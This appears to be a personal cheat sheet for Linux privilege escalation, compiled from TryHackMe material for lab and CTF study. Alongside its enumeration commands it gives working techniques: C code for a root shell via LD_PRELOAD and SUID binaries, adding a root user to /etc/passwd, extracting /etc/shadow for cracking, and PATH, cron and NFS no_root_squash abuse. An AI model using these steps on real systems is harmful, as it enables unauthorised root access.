Linux
These are notes that I have compiled from various sources to be a cheat sheet for privilege escalation on Windows machines. Some of these notes are from THM's Linux Privilege Escalation module. Others are from sources I find online.
Enumeration
| Command | Description |
|---|---|
hostname | hostname of the machine |
uname -a | system information about kernel |
cat /proc/version | system information about kernel (also if GCC is installed) |
cat /etc/issue | some information about the OS |
ps axjf | shows running processes (shows tree formation for commands) |
ps aux | shows processes for (a) = all users, (u) = user that launched the process, and (x) = shows processes not attached to a terminal |
env | shows environmental variables |
sudo -l | see what sudo command your current user can run |
ls -la | list all of the files in the current directory |
id (user) | general overview of the user's privilege group |
cat /etc/passwd | discover users on the system |
history | see the commands ran earlier |
ifconfig | network interface information |
ip route | network route information |
netstat -a | shows all listening ports and established connections |
netstat -l | list ports in listening mode, ready to accept incoming connection |
netstat -ano | -a = Display all sockets | -n = Do not resolve names | -o = Display timers |
find . -name flag1.txt | find the file named “flag1.txt” in the current directory |
find /home -name flag1.txt | find the file names “flag1.txt” in the /home directory |
find / -type d -name config | find the directory named config under “/” |
find / -type f -perm 0777 | find files with the 777 permissions (files readable, writable, and executable by all users) |
find / -perm a=x | find executable files |
find /home -user frank | find all files for user “frank” under “/home” |
find / -mtime 10 | find files that were modified in the last 10 days |
find / -atime 10 | find files that were accessed in the last 10 day |
find / -cmin -60 | find files changed within the last hour (60 minutes) |
find / -amin -60 | find files accesses within the last hour (60 minutes) |
find / -size (+\|-\|<nothing>)50M | find files with a 50 MB size (plus and minus for lower or higher) |
find / -writable -type d 2>/dev/null OR find / -perm -222 -type d 2>/dev/null OR find / -perm -o w -type d 2>/dev/null | Find world-writable folders |
find / -perm -o x -type d 2>/dev/null | Find world-executable folders |
find / -name <perl,python,etc.>* | Find development tools and supported languages |
find / -perm -u=s -type f 2>/dev/null | Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user |
nbstat -A (IP) | Windows command for enumerating Windows shares. <00> - Workstation. UNIQUE - computer must have one IP assigned to it. <20> - file sharing service is up and running |
enum4linux -U -o (IP) | enumerating information from Windows and Samba systems |
Automated Enumeration Tools
- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- LinEnum: https://github.com/rebootuser/LinEnum
- LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
- Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
- Linux Priv Checker: https://github.com/linted/linuxprivchecker
Helpful Commands
| Command | Description |
|---|---|
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")' OR /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")' | shell with python to go from $ to user@hostname:location$ |
ip route add 192.168.222.0/24 via 10.175.34.1 |
|
fping -a -g 192.168.82.0 192.168.82.255 2>/dev/null |
|
smbclient -L //(IP) -N |
|
(On Meterpreter) |
|
hashcat -m <mode> <hash file> <wordlist> | password cracking |
Privilege Escalation: Sudo
- Run
sudo -lto see what commands you have as sudo. - Search for those commands on https://gtfobins.github.io/
Leverage application functions
You can use applications to leak information from a file. If an application asks for an input file, you can make the input file to see /etc/shadow or other files and see what the error output shows.
Leverage LD_PRELOAD
LD_PRELOAD is a function that allows any program to use shared libraries. If the "env_keep" option is enabled we can generate a shared library which will be loaded and executed before the program is run. Please note the LD_PRELOAD option will be ignored if the real user ID is different from the effective user ID. - THM
The steps of this privilege escalation vector can be summarized as follows:
- Check for LD_PRELOAD (with the env_keep option)
- Write a simple C code compiled as a share object (.so extension) file
- Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
You can compile the code with the following command:
gcc -fPIC -shared -o shell.so <code_file>.c -nostartfiles
You can then run the program:
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
Privilege Escalation: SUID
find / -type f -perm -04000 -ls 2>/dev/nullwill list files that have SUID or SGID bits set.- Compare that with the suid binaries on https://gtfobins.github.io/#+suid
Reading the /etc/shadow file
If you can read the /etc/shadow file, you can use the following command to make a file that is crackable by John the Ripper:
unshadow passwd.txt shadow.txt > passwords.txt
OR
unshadow /etc/passwd /etc/shadow > passwords.txt
Adding a user to the /etc/passwd file
You can add a user with root privileges to the passwd file. You need a hash for the user in order to do this.
openssl passwd -1 -salt <salt_name> <password>
You can use this output to add yourself to the passwd file:
<username>:<output-from-command-above>:0:0:root:/root:/bin/bash
Privilege Escalation: Capabilities
Capabilities help manage privileges at a more granular level. For example, if the SOC analyst needs to use a tool that needs to initiate socket connections, a regular user would not be able to do that. If the system administrator does not want to give this user higher privileges, they can change the capabilities of the binary. As a result, the binary would get through its task without needing a higher privilege user.
getcap -r / 2>/dev/null-> list enabled capabilities- Go to https://gtfobins.github.io/#+capabilities to see if any of those capabilities are there
Privilege Escalation: Cron Jobs
Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user.
You can read the cron jobs under /etc/crontab
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
You can then edit or make those files and then wait for the cron job to start to get a reverse shell or read a file.
Sometimes you have to make the file executable for it to execute by the cron task
Privilege Escalation: PATH
If a folder for which your user has write permission is located in the path, you could potentially hijack an application to run a script. PATH in Linux is an environmental variable that tells the operating system where to search for executables. For any command that is not built into the shell or that is not defined with an absolute path, Linux will start searching in folders defined under PATH. (PATH is the environmental variable were are talking about here, path is the location of a file).
This depends entirely on the existing configuration of the target system, so be sure you can answer the questions below before trying this.
- What folders are located under $PATH (
echo $PATH) - Does your current user have write privileges for any of these folders?
- Can you modify $PATH?
- Is there a script/application you can start that will be affected by this vulnerability?
Script for launching a binary
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("binary_name");
}
Run the commands to compile the executable:
gcc script.c -o script -w
chmod u+s script
This will make the executable have a SUID bit.
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u -> find writable folders
export PATH=/tmp:$PATH -> to add /tmp to the PATH. You can add more as needed.
The vulnerability is to modify the binary or to replace it with your own code.
Privilege Escalation: NFS
NFS (Network File Sharing) configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by users. The critical element for this privilege escalation vector is the “no_root_squash” option. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.
cat /etc/exports -> for local mountable shares
showmount -e (IP) -> for remote mountable shares
NFS Steps to root:
cat /etc/exportsto see what the mountable shares are- Access those shares as the user to see if your user has access to it
- If so, in another terminal run the following from your own system (Kali/Parrot/etc.):
mkdir /tmp/<any-name-here>(I use /tmp for easy cleanup)sudo su rootmount -o rw (IP):/<remote-folder> /tmp/<any-name-here>cd /tmp/<any-name-here>- Add the following script to a file (ex. script.c)
gcc script.c -o script -wchmod +s script
- Switch to remote user and execute the script
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
umount -f -l /mnt/myfolder -> remove NFS connection (POST exploitation)